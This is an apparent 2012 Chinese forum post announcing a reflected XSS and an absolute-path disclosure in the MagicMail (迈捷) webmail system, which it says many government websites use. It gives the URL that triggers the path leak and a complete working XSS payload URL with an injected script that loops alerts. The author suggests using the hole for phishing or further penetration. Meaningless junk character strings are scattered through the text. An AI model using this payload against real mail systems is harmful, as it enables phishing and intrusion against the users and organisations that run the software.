今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞! g& B% w0 N, Z. R2 }
- Q! \& d, ~6 o% s
# U$ j0 C* O, M包含 一个反射性XSS 以及 绝对路径泄漏
0 K W* m) {( q. s' M- l看了看 貌似全部是linux的。; P; X4 [+ o2 n. o) F
0 k8 R4 F/ Y* h: ]* n- M关键字:迈捷邮件系统 by MagicMail
! ^. D2 @ A4 B4 o% s7 o. O/ B
- U8 h1 {% w2 C可以看到很多政府网站都用这个邮件系统) M+ X0 o" T; J% H0 \6 H, C
+ z" n" b3 `& E0 Q4 {! Z* S: q, \$ G绝对路径 http://madman.in/index.php?login_type=declare&language=0 g7 H, r9 l3 D2 i0 C; A, n
) z e/ F9 |, ~3 _
2 t* ^# d5 t6 a# M Y
+ i0 J* e6 _9 p' G" V$ I8 X' }/ oXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
3 s( [4 M3 U- ~/ V$ r
' h7 a, `8 w' C' } \ S
& x2 d3 I: ?% l7 j# r) p' P- i: Z* U
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
# ^% d4 f ]5 N- h e2 v' B
1 |& x, X6 G1 C6 S- y* ?修复方案:看官方补丁吧。/ v/ W& A, d5 h8 ]( F9 {9 e- l
|
发表于 2012-11-9 20:38:41
收藏
支持
反对